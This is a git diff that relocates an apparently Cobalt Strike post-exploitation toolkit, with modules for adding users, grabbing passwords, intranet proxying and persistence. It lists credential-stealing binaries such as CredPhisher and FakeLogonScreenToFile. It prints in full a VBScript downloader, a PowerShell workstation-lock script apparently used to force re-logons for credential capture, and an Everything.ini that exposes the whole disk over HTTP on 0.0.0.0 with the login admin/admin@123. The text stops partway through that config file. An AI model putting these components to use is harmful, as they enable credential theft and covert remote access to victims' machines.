diff --git a/Z1.cna b/Chinese/Z1.cna
similarity index 100%
rename from Z1.cna
rename to Chinese/Z1.cna
diff --git a/modules/About.cna b/Chinese/modules/About.cna
similarity index 100%
rename from modules/About.cna
rename to Chinese/modules/About.cna
diff --git a/modules/Add user.cna b/Chinese/modules/Add user.cna
similarity index 100%
rename from modules/Add user.cna
rename to Chinese/modules/Add user.cna
diff --git a/modules/Auxiliary.cna b/Chinese/modules/Auxiliary.cna
similarity index 100%
rename from modules/Auxiliary.cna
rename to Chinese/modules/Auxiliary.cna
diff --git a/modules/Grab password.cna b/Chinese/modules/Grab password.cna
similarity index 100%
rename from modules/Grab password.cna
rename to Chinese/modules/Grab password.cna
diff --git a/modules/Information collection.cna b/Chinese/modules/Information collection.cna
similarity index 100%
rename from modules/Information collection.cna
rename to Chinese/modules/Information collection.cna
diff --git a/modules/Intranet agent.cna b/Chinese/modules/Intranet agent.cna
similarity index 100%
rename from modules/Intranet agent.cna
rename to Chinese/modules/Intranet agent.cna
diff --git a/modules/Intranet scanning.cna b/Chinese/modules/Intranet scanning.cna
similarity index 100%
rename from modules/Intranet scanning.cna
rename to Chinese/modules/Intranet scanning.cna
diff --git a/modules/Locate AD.cna b/Chinese/modules/Locate AD.cna
similarity index 100%
rename from modules/Locate AD.cna
rename to Chinese/modules/Locate AD.cna
diff --git a/modules/Permission retention.cna b/Chinese/modules/Permission retention.cna
similarity index 100%
rename from modules/Permission retention.cna
rename to Chinese/modules/Permission retention.cna
diff --git a/modules/RDP.cna b/Chinese/modules/RDP.cna
similarity index 100%
rename from modules/RDP.cna
rename to Chinese/modules/RDP.cna
diff --git a/scripts/Add user/NetUser.exe b/Chinese/scripts/Add user/NetUser.exe
similarity index 100%
rename from scripts/Add user/NetUser.exe
rename to Chinese/scripts/Add user/NetUser.exe
diff --git a/scripts/Add user/bof_net_user.o b/Chinese/scripts/Add user/bof_net_user.o
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Add user/bof_net_user.o
rename to Chinese/scripts/Add user/bof_net_user.o
diff --git a/scripts/Auxiliary/SharpOSS.exe b/Chinese/scripts/Auxiliary/SharpOSS.exe
similarity index 100%
rename from scripts/Auxiliary/SharpOSS.exe
rename to Chinese/scripts/Auxiliary/SharpOSS.exe
diff --git a/scripts/Auxiliary/SharpZip.exe b/Chinese/scripts/Auxiliary/SharpZip.exe
similarity index 100%
rename from scripts/Auxiliary/SharpZip.exe
rename to Chinese/scripts/Auxiliary/SharpZip.exe
diff --git a/scripts/Auxiliary/download.vbs b/Chinese/scripts/Auxiliary/download.vbs
old mode 100755
new mode 100644
similarity index 96%
rename from scripts/Auxiliary/download.vbs
rename to Chinese/scripts/Auxiliary/download.vbs
index bc5a446..85a7e44
--- a/scripts/Auxiliary/download.vbs
+++ b/Chinese/scripts/Auxiliary/download.vbs
@@ -1,67 +1,67 @@ -dim url -dim file -Set objArgs = WScript.Arguments -if objArgs.Count < 2 then - msgbox("Invalid param count! should be: url pathfilename") -Else - url = objArgs(0) - file = objArgs(1) - GetHttpResult url, "UTF-8", file -end if - - -function GetHttpResult(url, charset, file) - dim http - set http = Createobject("Msxml2.ServerXMLHTTP") - Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä - 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long) - - http.Open "GET", url, False - 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword]) - - http.Send() - - If http.readystate = 4 Then - GetHttpResult = SaveToFile(http.ResponseBody, charset, file) - End If - -end function - -Function SaveToFile(str, charset, file) - Dim objStream - Set objStream = CreateObject("Adodb.Stream") - - objStream.Type = 1 - 'Const adTypeBinary = 1 - 'Const adTypeText = 2 - - objStream.Mode = 3 - 'Const adModeRead = 1 - 'Const adModeReadWrite = 3 - 'Const adModeRecursive = 4194304 - 'Const adModeShareDenyNone = 16 - 'Const adModeShareDenyRead = 4 - 'Const adModeShareDenyWrite = 8 - 'Const adModeShareExclusive = 12 - 'Const adModeUnknown = 0 - 'Const adModeWrite = 2 - - - objStream.Open - objStream.Write str - objStream.Position = 0 - - objStream.Type = 2 - 'adTypeBinary = 1 - 'adTypeText = 2 - - objStream.Charset = charset -' BytesToStr = objStream.ReadText - - objStream.SaveToFile file, 2 - 'adSaveCreateNotExist = 1 - 'adSaveCreateOverWrite = 2 - - objStream.Close - Set objStream = Nothing +dim url +dim file +Set objArgs = WScript.Arguments +if objArgs.Count < 2 then + msgbox("Invalid param count! 
should be: url pathfilename") +Else + url = objArgs(0) + file = objArgs(1) + GetHttpResult url, "UTF-8", file +end if + + +function GetHttpResult(url, charset, file) + dim http + set http = Createobject("Msxml2.ServerXMLHTTP") + Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä + 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long) + + http.Open "GET", url, False + 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword]) + + http.Send() + + If http.readystate = 4 Then + GetHttpResult = SaveToFile(http.ResponseBody, charset, file) + End If + +end function + +Function SaveToFile(str, charset, file) + Dim objStream + Set objStream = CreateObject("Adodb.Stream") + + objStream.Type = 1 + 'Const adTypeBinary = 1 + 'Const adTypeText = 2 + + objStream.Mode = 3 + 'Const adModeRead = 1 + 'Const adModeReadWrite = 3 + 'Const adModeRecursive = 4194304 + 'Const adModeShareDenyNone = 16 + 'Const adModeShareDenyRead = 4 + 'Const adModeShareDenyWrite = 8 + 'Const adModeShareExclusive = 12 + 'Const adModeUnknown = 0 + 'Const adModeWrite = 2 + + + objStream.Open + objStream.Write str + objStream.Position = 0 + + objStream.Type = 2 + 'adTypeBinary = 1 + 'adTypeText = 2 + + objStream.Charset = charset +' BytesToStr = objStream.ReadText + + objStream.SaveToFile file, 2 + 'adSaveCreateNotExist = 1 + 'adSaveCreateOverWrite = 2 + + objStream.Close + Set objStream = Nothing End Function \ No newline at end of file diff --git a/scripts/Grab password/BrowserGhost.exe b/Chinese/scripts/Grab password/BrowserGhost.exe similarity index 100% rename from scripts/Grab password/BrowserGhost.exe rename to Chinese/scripts/Grab password/BrowserGhost.exe 
diff --git a/scripts/Grab password/CredPhisher.exe b/Chinese/scripts/Grab password/CredPhisher.exe
similarity index 100%
rename from scripts/Grab password/CredPhisher.exe
rename to Chinese/scripts/Grab password/CredPhisher.exe
diff --git a/scripts/Grab password/FakeLogonScreenToFile.exe b/Chinese/scripts/Grab password/FakeLogonScreenToFile.exe
similarity index 100%
rename from scripts/Grab password/FakeLogonScreenToFile.exe
rename to Chinese/scripts/Grab password/FakeLogonScreenToFile.exe
diff --git a/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe b/Chinese/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe
similarity index 100%
rename from scripts/Grab password/Net-GPPPassword_dotNET_v2.exe
rename to Chinese/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe
diff --git a/scripts/Grab password/SharpChromium.exe b/Chinese/scripts/Grab password/SharpChromium.exe
similarity index 100%
rename from scripts/Grab password/SharpChromium.exe
rename to Chinese/scripts/Grab password/SharpChromium.exe
diff --git a/scripts/Grab password/SharpCloud.exe b/Chinese/scripts/Grab password/SharpCloud.exe
similarity index 100%
rename from scripts/Grab password/SharpCloud.exe
rename to Chinese/scripts/Grab password/SharpCloud.exe
diff --git a/scripts/Grab password/SharpDecryptPwd.exe b/Chinese/scripts/Grab password/SharpDecryptPwd.exe
similarity index 100%
rename from scripts/Grab password/SharpDecryptPwd.exe
rename to Chinese/scripts/Grab password/SharpDecryptPwd.exe
diff --git a/scripts/Grab password/SharpDecryptPwd40.exe b/Chinese/scripts/Grab password/SharpDecryptPwd40.exe
similarity index 100%
rename from scripts/Grab password/SharpDecryptPwd40.exe
rename to Chinese/scripts/Grab password/SharpDecryptPwd40.exe
diff --git a/scripts/Grab password/SharpWifiGrabber.exe b/Chinese/scripts/Grab password/SharpWifiGrabber.exe
similarity index 100%
rename from scripts/Grab password/SharpWifiGrabber.exe
rename to Chinese/scripts/Grab password/SharpWifiGrabber.exe
diff --git a/scripts/Grab password/hack-browser-data.exe b/Chinese/scripts/Grab password/hack-browser-data.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Grab password/hack-browser-data.exe rename to Chinese/scripts/Grab password/hack-browser-data.exe diff --git a/scripts/Grab password/lock-screen.ps1 b/Chinese/scripts/Grab password/lock-screen.ps1 old mode 100755 new mode 100644 similarity index 96% rename from scripts/Grab password/lock-screen.ps1 rename to Chinese/scripts/Grab password/lock-screen.ps1 index 7983d09..acf90db --- a/scripts/Grab password/lock-screen.ps1 +++ b/Chinese/scripts/Grab password/lock-screen.ps1 @@ -1,14 +1,14 @@ -Function Lock-WorkStation { - -$signature = @" -[DllImport("user32.dll", SetLastError = true)] -public static extern bool LockWorkStation(); -"@ - -$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru - -$LockWorkStation::LockWorkStation() | Out-Null - -} - +Function Lock-WorkStation { + +$signature = @" +[DllImport("user32.dll", SetLastError = true)] +public static extern bool LockWorkStation(); +"@ + +$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru + +$LockWorkStation::LockWorkStation() | Out-Null + +} + Lock-WorkStation \ No newline at end of file diff --git a/scripts/Information collection/AdFind.exe b/Chinese/scripts/Information collection/AdFind.exe similarity index 100% rename from scripts/Information collection/AdFind.exe rename to Chinese/scripts/Information collection/AdFind.exe diff --git a/scripts/Information collection/SharpAVKB.exe b/Chinese/scripts/Information collection/SharpAVKB.exe similarity index 100% rename from scripts/Information collection/SharpAVKB.exe rename to Chinese/scripts/Information collection/SharpAVKB.exe 
diff --git a/scripts/Information collection/SharpChassisType.exe b/Chinese/scripts/Information collection/SharpChassisType.exe
similarity index 100%
rename from scripts/Information collection/SharpChassisType.exe
rename to Chinese/scripts/Information collection/SharpChassisType.exe
diff --git a/scripts/Information collection/SharpCheckInfo.exe b/Chinese/scripts/Information collection/SharpCheckInfo.exe
similarity index 100%
rename from scripts/Information collection/SharpCheckInfo.exe
rename to Chinese/scripts/Information collection/SharpCheckInfo.exe
diff --git a/scripts/Information collection/SharpClipHistory.exe b/Chinese/scripts/Information collection/SharpClipHistory.exe
similarity index 100%
rename from scripts/Information collection/SharpClipHistory.exe
rename to Chinese/scripts/Information collection/SharpClipHistory.exe
diff --git a/scripts/Information collection/SharpDir.exe b/Chinese/scripts/Information collection/SharpDir.exe
similarity index 100%
rename from scripts/Information collection/SharpDir.exe
rename to Chinese/scripts/Information collection/SharpDir.exe
diff --git a/scripts/Information collection/SharpEDRChecker.exe b/Chinese/scripts/Information collection/SharpEDRChecker.exe
similarity index 100%
rename from scripts/Information collection/SharpEDRChecker.exe
rename to Chinese/scripts/Information collection/SharpEDRChecker.exe
diff --git a/scripts/Information collection/SharpEventLog.exe b/Chinese/scripts/Information collection/SharpEventLog.exe
similarity index 100%
rename from scripts/Information collection/SharpEventLog.exe
rename to Chinese/scripts/Information collection/SharpEventLog.exe
diff --git a/scripts/Information collection/SharpSQLDump.exe b/Chinese/scripts/Information collection/SharpSQLDump.exe
similarity index 100%
rename from scripts/Information collection/SharpSQLDump.exe
rename to Chinese/scripts/Information collection/SharpSQLDump.exe
diff --git a/scripts/Information collection/SharpWebScan.exe b/Chinese/scripts/Information collection/SharpWebScan.exe
similarity index 100%
rename from scripts/Information collection/SharpWebScan.exe
rename to Chinese/scripts/Information collection/SharpWebScan.exe
diff --git a/scripts/Information collection/everything/Everything.exe b/Chinese/scripts/Information collection/everything/Everything.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Information collection/everything/Everything.exe
rename to Chinese/scripts/Information collection/everything/Everything.exe
diff --git a/scripts/Information collection/everything/Everything.ini b/Chinese/scripts/Information collection/everything/Everything.ini
old mode 100755
new mode 100644
similarity index 96%
rename from scripts/Information collection/everything/Everything.ini
rename to Chinese/scripts/Information collection/everything/Everything.ini
index fa9ae67..883e519
--- a/scripts/Information collection/everything/Everything.ini
+++ b/Chinese/scripts/Information collection/everything/Everything.ini
@@ -1,737 +1,737 @@ -; Please make sure Everything is not running before modifying this file. -[Everything] -run_as_admin=1 -allow_http_server=1 -allow_etp_server=1 -window_x=198 -window_y=89 -window_wide=785 -window_high=650 -maximized=0 -minimized=0 -fullscreen=0 -ontop=0 -bring_into_view=1 -alpha=255 -match_whole_word=0 -match_path=0 -match_case=0 -match_diacritics=0 -match_regex=0 -view=0 -thumbnail_size=64 -thumbnail_fill=0 -min_thumbnail_size=32 -max_thumbnail_size=256 -medium_thumbnail_size=64 -large_thumbnail_size=128 -extra_large_thumbnail_size=256 -thumbnail_load_size=0 -thumbnail_overlay_icon=1 -shell_max_path=0 -allow_multiple_windows=0 -allow_multiple_instances=0 -run_in_background=1 -show_in_taskbar=1 -show_tray_icon=1 -minimize_to_tray=0 -toggle_window_from_tray_icon=0 -alternate_row_color=0 -show_mouseover=0 -check_for_updates_on_startup=0 -beta_updates=0 -show_highlighted_search_terms=1 -text_size=0 -hide_empty_search_results=0 -clear_selection_on_search=1 -show_focus_on_search=0 -new_window_key=0 -show_window_key=0 -toggle_window_key=0 -language=0 -show_selected_item_in_statusbar=1 -statusbar_selected_item_format= -show_size_in_statusbar=0 -statusbar_size_format=0 -open_folder_command2= -open_file_command2= -open_path_command2= -explore_command2= -explore_path_command2= -window_title_format= -taskbar_notification_title_format= -instance_name= -translucent_selection_rectangle_alpha=70 -min_zoom=-6 -max_zoom=27 -context_menu_type=0 -context_menu_shell_extensions=1 -auto_include_fixed_volumes=1 -auto_include_removable_volumes=0 -auto_remove_offline_ntfs_volumes=1 -auto_remove_moved_ntfs_volumes=1 -auto_include_fixed_refs_volumes=1 -auto_include_removable_refs_volumes=0 -auto_remove_offline_refs_volumes=1 -auto_remove_moved_refs_volumes=1 -find_mount_points_on_removable_volumes=0 -last_export_type=0 -max_threads=0 -reuse_threads=1 -find_subfolders_and_files_max_threads=0 -single_parent_context_menu=0 -auto_size_1=512 -auto_size_2=640 -auto_size_3=768 
-auto_size_aspect_ratio_x=9 -auto_size_aspect_ratio_y=7 -auto_size_width_only=0 -auto_size_path_x=1 -auto_size_path_y=2 -sticky_vscroll_bottom=1 -last_options_page=17 -draw_focus_rect=1 -date_format= -time_format= -listview_item_high=0 -single_click_open=0 -underline_icon_titles=0 -icons_only=0 -icon_shell_extensions=1 -auto_scroll_repeat_delay=250 -auto_scroll_repeat_rate=50 -open_many_files_warning_threshold=16 -set_foreground_window_attach_thread_input=0 -debug=0 -debug_log=0 -verbose=0 -lvm=1 -ipc=1 -home_match_case=0 -home_match_whole_word=0 -home_match_path=0 -home_match_diacritics=0 -home_regex=0 -home_search=1 -home_filter=0 -home_sort=0 -home_view=0 -home_index=1 -allow_multiple_windows_from_tray=0 -single_click_tray=0 -close_on_execute=0 -double_click_path=0 -update_display_after_scroll=0 -update_display_after_mask=1 -auto_scroll_view=0 -double_quote_copy_as_path=0 -snap=0 -snaplen=10 -rename_select_filepart_only=0 -rename_move_caret_to_selection_end=0 -rename_nav=0 -search_edit_move_caret_to_selection_end=0 -search_edit_drag_accept_files=0 -select_search_on_mouse_click=1 -focus_search_on_activate=0 -reset_vscroll_on_search=1 -wrap_focus=0 -load_icon_priority=0 -load_thumbnail_priority=0 -load_fileinfo_priority=0 -always_request_all_fileinfo=0 -header_high=0 -hide_on_close=0 -max_hidden_windows=0x00000000 -winmm=0 -menu_escape_amp=1 -menu_folders=0 -menu_folder_separator= -menu_items_per_column=0 -new_inherit=1 -full_row_select=0 -tray_show_command_line= -dpi=96 -ctrl_mouse_wheel_action=1 -allow_open=1 -allow_context_menu=1 -allow_delete=1 -allow_rename=1 -allow_cut=1 -allow_copy=1 -allow_paste=1 -allow_drag_drop=1 -allow_window_message_filter_dragdrop=0 -auto_column_widths=0 -hotkey_explorer_path_search=0 -get_key_name_text=1 -paste_new_line_op=0 -esc_cancel_action=1 -fast_ascii_search=1 -match_path_when_search_contains_path_separator=1 -allow_literal_operators=0 -allow_round_bracket_parenthesis=0 -expand_environment_variables=0 -search_as_you_type=1 
-always_update_query_on_search_parameter_change=0 -convert_forward_slash_to_backslash=0 -match_whole_filename_when_using_wildcards=1 -operator_precedence=0 -replace_exact_trailing_star_dot_star_with_star=1 -allow_exclamation_point_not=1 -search_command_prefix= -auto_complete_search_command=1 -double_buffer=1 -search= -show_number_of_results_with_selection=0 -date_descending_first=0 -size_descending_first=0 -size_format=2 -alpha_select=0 -tooltips=1 -listview_tooltips=1 -show_detailed_listview_tooltips=1 -rtl_listview_edit=0 -force_path_ltr_order=1 -force_path_left_align=1 -date_time_order=0 -date_time_align=1 -size_align=3 -invert_layout=0 -update_layout_on_input_language_change=0 -control_shift_action=3 -change_search_rtl_reading_action=3 -invert_layout_action=3 -bookmark_remember_case=1 -bookmark_remember_wholeword=1 -bookmark_remember_path=1 -bookmark_remember_diacritic=1 -bookmark_remember_regex=1 -bookmark_remember_sort=1 -bookmark_remember_view=1 -bookmark_remember_filter=1 -bookmark_remember_index=1 -bookmark_remember_search=1 -bookmark_organize_x=0 -bookmark_organize_y=0 -bookmark_organize_wide=0 -bookmark_organize_high=0 -exclude_list_enabled=1 -exclude_hidden_files_and_folders=0 -exclude_system_files_and_folders=0 -include_only_files= -exclude_files= -db_location= -db_multi_user_filename=0 -db_compress=0 -index_size=1 -fast_size_sort=1 -index_date_created=0 -fast_date_created_sort=0 -index_date_modified=1 -fast_date_modified_sort=1 -index_date_accessed=0 -fast_date_accessed_sort=0 -index_attributes=0 -fast_attributes_sort=0 -index_folder_size=0 -fast_path_sort=1 -fast_extension_sort=0 -extended_information_cache_monitor=1 -db_update_thread_priority=-15 -index_recent_changes=1 -refs_file_id_extd_directory_info_buffer_size=0 -folder_update_thread_mode_background=0 -folder_update_rescan_asap=1 -monitor_thread_mode_background=1 -monitor_retry_delay=30000 -monitor_update_delay=1000 -monitor_pause=0 -usn_record_filter=0xffffffff -cancel_delay=0x000003e8 
-allow_ntfs_open_file_by_id=1 -always_update_folder_recent_change=0 -editor_x=0 -editor_y=0 -editor_wide=0 -editor_high=0 -editor_maximized=0 -file_list_relative_paths=0 -rename_x=0 -rename_y=0 -rename_wide=0 -rename_high=0 -rename_match_case=0 -rename_regex=0 -advanced_copy_to_x=0 -advanced_copy_to_y=0 -advanced_copy_to_wide=0 -advanced_copy_to_high=0 -advanced_copy_to_match_case=0 -advanced_copy_to_regex=0 -advanced_move_to_x=0 -advanced_move_to_y=0 -advanced_move_to_wide=0 -advanced_move_to_high=0 -advanced_move_to_match_case=0 -advanced_move_to_regex=0 -advanced_search_x=0 -advanced_search_y=0 -advanced_search_wide=0 -advanced_search_high=0 -advanced_search_page_y_offset=0 -advanced_search_focus_id=0 -advanced_search_warnings=1 -max_recv_size=8388608 -display_full_path_name=0 -size_tiny=10240 -size_small=102400 -size_medium=1048576 -size_large=16777216 -size_huge=134217728 -themed_toolbar=1 -show_copy_name=2 -show_copy_path=2 -show_copy_full_name=2 -show_open_path=2 -show_explore=2 -show_explore_path=2 -copy_path_folder_append_backslash=0 -custom_verb01= -custom_verb02= -custom_verb03= -custom_verb04= -custom_verb05= -custom_verb06= -custom_verb07= -custom_verb08= -custom_verb09= -custom_verb10= -custom_verb11= -custom_verb12= -filters_visible=0 -filters_wide=128 -filters_right_align=1 -filters_tab_stop=0 -filter= -filter_everything_name= -filter_organize_x=0 -filter_organize_y=0 -filter_organize_wide=0 -filter_organize_high=0 -preview_visible=0 -preview_x=640 -preview_tab_stop=0 -preview_mag_filter=0 -preview_min_filter=0 -preview_fill=0 -show_preview_handlers_in_preview_pane=0 -preview_load_size=0 -preview_context=0x00000000 -preview_release_handler_on_clear=0 -sort=Run Count -sort_ascending=0 -always_keep_sort=0 -index=0 -index_file_list= -index_etp_server= -index_link_type=1 -status_bar_visible=1 -select_search_on_focus_mode=1 -select_search_on_set_mode=2 -search_history_enabled=0 -run_history_enabled=1 -search_history_days_to_keep=90 
-run_history_days_to_keep=90 -search_history_keep_forever=1 -run_history_keep_forever=1 -search_history_always_suggest=0 -search_history_always_suggest_extend_toolbar=0 -search_history_visible_count_max=12 -search_history_always_suggest_visible_count_max=1 -search_history_show_all_max=256 -search_history_suggestion_max=256 -search_history_show_all_sort=2 -search_history_suggestion_sort=1 -search_history_show_above=0 -search_history_sort=2 -search_history_sort_ascending=0 -search_history_x=0 -search_history_y=0 -search_history_wide=0 -search_history_high=0 -search_history_column_search_wide=208 -search_history_column_search_order=0 -search_history_column_count_wide=128 -search_history_column_count_order=1 -search_history_column_date_wide=128 -search_history_column_date_order=2 -etp_server_enabled=0 -etp_server_bindings= -etp_server_port=21 -etp_server_username= -etp_server_password= -etp_server_welcome_message= -etp_server_log_file_name= -etp_server_logging_enabled=0 -etp_server_log_max_size=4194304 -etp_server_log_delta_size=524288 -etp_server_allow_file_download=1 -ftp_allow_port=1 -ftp_check_data_connection_ip=1 -http_server_enabled=1 -http_server_bindings=0.0.0.0 -http_title_format= -http_server_port=65535 -http_server_username=admin -http_server_password=admin@123 -http_server_home= -http_server_default_page= -http_server_log_file_name= -http_server_logging_enabled=0 -http_server_log_max_size=419430400 -http_server_log_delta_size=524288 -http_server_allow_file_download=1 -http_server_items_per_page=32 -http_server_show_drive_labels=0 -http_server_strings= -http_server_access_control_allow_origin= -service_pipe_name= -name_column_pos=0 -name_column_width=256 -path_column_visible=1 -path_column_pos=1 -path_column_width=256 -size_column_visible=1 -size_column_pos=2 -size_column_width=96 -extension_column_visible=0 -extension_column_pos=3 -extension_column_width=96 -type_column_visible=0 -type_column_pos=4 -type_column_width=96 -last_write_time_column_visible=1 
-last_write_time_column_pos=3 -last_write_time_column_width=153 -creation_time_column_visible=0 -creation_time_column_pos=6 -creation_time_column_width=153 -date_accessed_column_visible=0 -date_accessed_column_pos=7 -date_accessed_column_width=153 -attribute_column_visible=0 -attribute_column_pos=8 -attribute_column_width=70 -date_recently_changed_column_visible=0 -date_recently_changed_column_pos=9 -date_recently_changed_column_width=153 -run_count_column_visible=0 -run_count_column_pos=10 -run_count_column_width=96 -date_run_column_visible=0 -date_run_column_pos=11 -date_run_column_width=153 -file_list_filename_column_visible=0 -file_list_filename_column_pos=12 -file_list_filename_column_width=96 -translucent_selection_rectangle_background_color= -translucent_selection_rectangle_border_color= -thumbnail_mouseover_border_color= -preview_background_color= -ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" -ntfs_volume_paths="C:","C:" -ntfs_volume_roots="","" -ntfs_volume_includes=1,1 -ntfs_volume_load_recent_changes=0,0 -ntfs_volume_include_onlys="","" -ntfs_volume_monitors=1,1 -refs_volume_guids= -refs_volume_paths= -refs_volume_roots= -refs_volume_includes= -refs_volume_load_recent_changes= -refs_volume_include_onlys= -refs_volume_monitors= -filelists= -filelist_monitor_changes= -folders= -folder_monitor_changes= -folder_buffer_size_list= -folder_rescan_if_full_list= -folder_update_types= -folder_update_days= -folder_update_ats= -folder_update_intervals= -folder_update_interval_types= -exclude_folders= -connect_history_hosts= -connect_history_ports= -connect_history_usernames= -connect_history_link_types= -etp_client_rewrite_patterns= -etp_client_rewrite_substitutions= -file_new_search_window_keys=334 -file_open_file_list_keys=335 -file_close_file_list_keys= -file_close_keys=343,27 -file_export_keys=339 -file_copy_full_name_to_clipboard_keys=9539 -file_copy_path_to_clipboard_keys= 
-file_set_run_count_keys= -file_create_shortcut_keys= -file_delete_keys=8238 -file_delete_permanently_keys=9262 -file_edit_keys= -file_open_keys=8205 -file_open_selection_and_close_everything_keys= -file_explore_path_keys= -file_open_new_keys= -file_open_path_keys=8461 -file_open_with_keys= -file_open_with_default_verb_keys= -file_play_keys= -file_preview_keys= -file_print_keys= -file_print_to_keys= -file_properties_keys=8717 -file_read_extended_information_keys=8517 -file_rename_keys=8305 -file_run_as_keys= -file_exit_keys=337 -file_copy_name_to_clipboard_keys= -file_open_selection_and_do_not_close_everything_keys= -file_open_most_run_keys= -file_open_last_run_keys= -file_custom_verb_1_keys= -file_custom_verb_2_keys= -file_custom_verb_3_keys= -file_custom_verb_4_keys= -file_custom_verb_5_keys= -file_custom_verb_6_keys= -file_custom_verb_7_keys= -file_custom_verb_8_keys= -file_custom_verb_9_keys= -file_custom_verb_10_keys= -file_custom_verb_11_keys= -file_custom_verb_12_keys= -indexes_folders_rescan_all_now_keys= -indexes_force_rebuild_keys= -edit_cut_keys=8536 -edit_copy_keys=8515,8493 -edit_paste_keys=8534,9261 -edit_select_all_keys=8513 -edit_invert_selection_keys= -edit_copy_to_folder_keys= -edit_move_to_folder_keys= -edit_advanced_advanced_copy_to_folder_keys= -edit_advanced_advanced_move_to_folder_keys= -view_filters_keys= -view_preview_keys=592 -view_status_bar_keys= -view_details_keys=1334 -view_medium_thumbnails_keys=1331 -view_large_thumbnails_keys=1330 -view_extra_large_thumbnails_keys=1329 -view_increase_thumbnail_size_keys=1467 -view_decrease_thumbnail_size_keys=1469 -view_window_size_small_keys=561 -view_window_size_medium_keys=562 -view_window_size_large_keys=563 -view_window_size_auto_fit_keys=564 -view_zoom_zoom_in_keys=443 -view_zoom_zoom_out_keys=445 -view_zoom_reset_keys=304,352 -view_go_to_back_keys=549,166 -view_go_to_forward_keys=551,167 -view_go_to_home_keys=548 -view_go_to_show_all_history_keys=1352,328 -view_sort_by_name_keys=305 
-view_sort_by_path_keys=306 -view_sort_by_size_keys=307 -view_sort_by_extension_keys=308 -view_sort_by_type_keys=309 -view_sort_by_date_modified_keys=310 -view_sort_by_date_created_keys=311 -view_sort_by_attributes_keys=312 -view_sort_by_file_list_filename_keys= -view_sort_by_run_count_keys= -view_sort_by_date_run_keys= -view_sort_by_date_recently_changed_keys=313 -view_sort_by_date_accessed_keys= -view_sort_by_ascending_keys= -view_sort_by_descending_keys= -view_refresh_keys=116 -view_fullscreen_keys=122 -view_toggle_ltrrtl_direction_keys= -view_on_top_never_keys= -view_on_top_always_keys= -view_on_top_while_searching_keys= -search_match_case_keys=329 -search_match_whole_word_keys=322 -search_match_path_keys=341 -search_match_diacritics_keys=333 -search_enable_regex_keys=338 -search_advanced_search_keys= -search_add_to_filters_keys= -search_organize_filters_keys=1350 -bookmarks_add_to_bookmarks_keys=324 -bookmarks_organize_bookmarks_keys=1346 -tools_options_keys=336 -tools_console_keys=448 -tools_file_list_editor_keys= -tools_connect_to_etp_server_keys= -tools_disconnect_from_etp_server_keys= -help_everything_help_keys=112 -help_search_syntax_keys= -help_regex_syntax_keys= -help_command_line_options_keys= -help_everything_website_keys= -help_check_for_updates_keys= -help_about_everything_keys=368 -help_donate_keys= -search_edit_focus_search_edit_keys=326,114,580 -search_edit_delete_previous_word_keys=4360 -search_edit_auto_complete_search_keys=4384 -search_edit_show_search_history_keys= -search_edit_show_all_search_history_keys=4646,4648 -result_list_item_up_keys=8230,4134 -result_list_item_down_keys=8232,4136 -result_list_page_up_keys=8225,4129 -result_list_page_down_keys=8226,4130 -result_list_start_of_list_keys=8228 -result_list_end_of_list_keys=8227 -result_list_item_up_extend_keys=9254,5158 -result_list_item_down_extend_keys=9256,5160 -result_list_page_up_extend_keys=9249,5153 -result_list_page_down_extend_keys=9250,5154 
-result_list_start_of_list_extend_keys=9252 -result_list_end_of_list_extend_keys=9251 -result_list_focus_up_keys=8486,4390 -result_list_focus_down_keys=8488,4392 -result_list_focus_page_up_keys=8481,4385 -result_list_focus_page_down_keys=8482,4386 -result_list_focus_start_of_list_keys=8484 -result_list_focus_end_of_list_keys=8483 -result_list_focus_up_extend_keys=9510,5414 -result_list_focus_down_extend_keys=9512,5416 -result_list_focus_page_up_extend_keys=9505,5409 -result_list_focus_page_down_extend_keys=9506,5410 -result_list_focus_start_of_list_extend_keys=9508 -result_list_focus_end_of_list_extend_keys=9507 -result_list_focus_result_list_keys= -result_list_focus_highest_run_count_result_keys= -result_list_focus_last_run_result_keys= -result_list_toggle_path_column_keys= -result_list_toggle_size_column_keys= -result_list_toggle_extension_column_keys= -result_list_toggle_type_column_keys= -result_list_toggle_date_modified_column_keys= -result_list_toggle_date_created_column_keys= -result_list_toggle_attributes_column_keys= -result_list_toggle_file_list_filename_column_keys= -result_list_toggle_run_count_column_keys= -result_list_toggle_date_recently_changed_column_keys= -result_list_toggle_date_accessed_column_keys= -result_list_toggle_date_run_column_keys= -result_list_size_all_columns_to_fit_keys=8555 -result_list_size_result_list_to_fit_keys= -result_list_context_menu_keys=9337 -result_list_scroll_left_or_thumbnail_left_keys=8229 -result_list_scroll_right_or_thumbnail_right_keys=8231 -result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 -result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 -result_list_left_extend_keys=9253 -result_list_right_extend_keys=9255 -result_list_focus_left_extend_keys=9509 -result_list_focus_right_extend_keys=9511 -result_list_select_focus_keys=8224 -result_list_toggle_focus_selection_keys=8480 -result_list_copy_as_csv_keys= -preview_focus_preview_keys= -result_list_font= -result_list_font_size= 
